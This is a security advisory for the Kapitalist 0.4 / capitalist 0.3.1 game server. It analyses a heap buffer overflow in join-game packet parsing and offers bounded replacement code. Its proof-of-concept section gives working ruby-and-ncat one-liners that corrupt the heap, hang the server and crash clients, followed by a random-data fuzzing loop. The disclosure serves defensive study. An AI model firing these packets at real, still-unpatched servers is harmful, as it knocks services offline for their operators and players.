Kapitalist 0.4 / Capitalist 0.3.1 Denial Of Service

Published 14 May 2010. Reported by Sebastien Duquette. Type: packetstorm (source: packetstormsecurity.com).

Kapitalist 0.3.1 Denial-of-Service vulnerabilities

GVI-2010-01 : Multiple vulnerabilities in Kapitalist/capitalist
  
Overview  
-----------  
Quote from http://kapitalist.sourceforge.net/
"Kapitalist is a Monopoly®-like board game for 2-8 players. Walk around the board, buy properties, receive rent from your competitors, try to get monopolies to build houses and hotels on them and finally be the richest on the board."
  
Description  
-------------  
Two issues were found in capitalist when sending specially crafted packets. One results in heap corruption; the second makes the server enter an endless loop, resulting in a Denial-of-Service.

Additionally, sending a specially crafted packet causes the connected clients to disconnect.
  
Details  
--------  
Vulnerable Product : capitalist 0.3.1, Kapitalist 0.4  
Vulnerability Type : Buffer overflow, Denial-of-Service  
Discovered by : Sébastien Duquette (virtualguardian.ca)  
  
Original Advisory :  
http://www.gardienvirtuel.ca/wp-content/uploads/2010/05/GVI-2010-01-EN.txt  
  
Timeline  
----------  
The vendor was contacted but no response was received within a two-week period.
  
Bug Discovered : October 12th, 2009  
Vendor Advised : October 14th, 2009  
Additional info sent : October 17th, 2009  
Vendor Response : October 26th, 2009  
Vendor recontacted : February 7th, 2010  
Vendor Response : February 14th, 2010  
Public Disclosure : May 13th, 2010  
  
Analysis  
--------  
When receiving a join game request, capitalist allocates a packet_req_join_game structure on the heap and copies the received data to it. On the last shown line, it copies a string. It does not check, however, whether the string fits in the allocated buffer.
  
common/packets.cpp, line 432 (excerpt)
```c
struct packet_req_join_game *
receive_packet_req_join_game(struct connection *pc)
{
    unsigned char *cptr;
    struct packet_req_join_game *packet =
        (struct packet_req_join_game *)
        cap_malloc(sizeof(struct packet_req_join_game));

    cptr = get_int16(pc->buffer.data, NULL);
    cptr = get_int8(cptr, NULL);
    cptr = get_string(cptr, packet->name); /* unbounded copy into the 10-byte name field */
```
  
When called, the get_string() function copies the string and causes a buffer overflow if the string is longer than the allocated size (10 bytes).
  
common/packets.cpp, line 271
```c
unsigned char *get_string(unsigned char *buffer, char *mystring)
{
    unsigned char *c;
    int len;

    /* avoid using strlen (or strcpy) on an (unsigned char*) --dwp */
    for (c = buffer; *c; c++) ;      /* scan to the NUL: no limit from packet or destination size */
    len = c - buffer + 1;
    if (mystring) {
        memcpy(mystring, buffer, len); /* len may exceed sizeof(packet->name) */
    }
    return buffer + len;
}
```
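As an added example (not capitalist's own code), here is a bounded replacement for the get_string() pattern above: it refuses strings that are unterminated within the received packet or longer than the destination field, so a packet like the one in Bug #1 is rejected instead of corrupting the heap. The packet layout assumed here (2-byte length, 1-byte type, then the name), the NAME_LEN constant and the sample packets are constructed for the example.

```c
#include <stddef.h>
#include <string.h>

#define NAME_LEN 10 /* assumed size of packet_req_join_game.name, per the advisory */

/* Bounded get_string: returns a pointer past the terminating NUL on success, or
   NULL if no NUL lies within `remaining` bytes or the string (with NUL) does not
   fit in dest_size bytes. Nothing is copied on failure. */
const unsigned char *get_string_safe(const unsigned char *buffer, size_t remaining,
                                     char *dest, size_t dest_size)
{
    const unsigned char *c = buffer;
    const unsigned char *end = buffer + remaining;
    size_t len;

    while (c < end && *c) c++;
    if (c == end) return NULL;        /* unterminated: would read past the packet */
    len = (size_t)(c - buffer) + 1;   /* include the NUL */
    if (len > dest_size) return NULL; /* would overflow the destination field */
    if (dest) memcpy(dest, buffer, len);
    return buffer + len;
}

/* Mirrors the join-game parse: skip the assumed 2-byte length and 1-byte type,
   then read the name. Returns 0 on success, -1 if the packet is malformed. */
int parse_join_name(const unsigned char *pkt, size_t pktlen, char *name, size_t name_size)
{
    if (pktlen < 3) return -1;
    return get_string_safe(pkt + 3, pktlen - 3, name, name_size) ? 0 : -1;
}

/* Constructed sample: 35 'A's aimed at the 10-byte name field (the Bug #1 shape). */
int demo_oversized_name(void)
{
    unsigned char pkt[3 + 35 + 1];
    char name[NAME_LEN];
    pkt[0] = 0x00; pkt[1] = 0x14; pkt[2] = 0x00;
    memset(pkt + 3, 'A', 35);
    pkt[3 + 35] = 0x00;
    return parse_join_name(pkt, sizeof pkt, name, sizeof name); /* -1: rejected */
}

/* Constructed sample: a well-formed name that fits; returns 1 if parsed as "Alice". */
int demo_valid_name(void)
{
    static const unsigned char pkt[] = {0x00, 0x14, 0x00, 'A', 'l', 'i', 'c', 'e', 0x00};
    char name[NAME_LEN];
    if (parse_join_name(pkt, sizeof pkt, name, sizeof name) != 0) return 0;
    return strcmp(name, "Alice") == 0;
}

/* Constructed sample: name with no terminator inside the packet; returns -1. */
int demo_unterminated_name(void)
{
    static const unsigned char pkt[] = {0x00, 0x14, 0x00, 'A', 'A', 'A', 'A'};
    char name[NAME_LEN];
    return parse_join_name(pkt, sizeof pkt, name, sizeof name);
}
```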
  
Proof of concept  
----------------  
  
Bug #1: Heap corruption  
~~~~~~~~~~~~~~~~~~~~~~~  
  
```sh
ruby -e "print 0x00.chr << 0x14 << 0x00 << 'A'*35 << 0x00 " | ncat SERVER 2525
```
  
If MALLOC_CHECK_ is enabled, a message similar to this will be printed:
```
*** glibc detected *** /home/ekse/src/capitalist2/bin/capitalist: malloc(): memory corruption: 0x081a7650 ***
```

Inspecting the memory shows that our packet is the source of the crash:
```
(gdb) x 0x081a7650
0x81a7650: 0x00414141
```
  
  
Bug #2: Endless loop  
~~~~~~~~~~~~~~~~~~~~  
  
```sh
ruby -e "print 0x00.chr << 0x14 << 0x00 << 'AAAAAAAAAA' << 0x00.chr * 8 << 0x02 << 0x00.chr * 3 << 0x00" | ncat SERVER 2525
```
  
  
Bug #3: Crashing the clients  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
```sh
ruby -e "print 0x00.chr << 0x14 << 0x00 << 'AAAAA' << 0x00.chr * 8 << 0x02 << 0x00.chr * 3 << 0x00" | ncat SERVER 2525
```

After sending this packet, close ncat. The clients will then crash with the following message:
```
kapitalist: kapgame.cpp:239: Player* const KapGame::player(int) const: Assertion `!nobody(id)' failed.
```
  
Fun Fact  
---------   
The flaw in the server was found this way (a random-data fuzzing loop against a local instance):
```sh
while true; do cat /dev/urandom | nc 127.0.0.1 2525; done
```
  
Solution  
---------  
There is currently no fix for these issues. It is recommended not to make servers available on the Internet and to accept connections only from trusted sources.
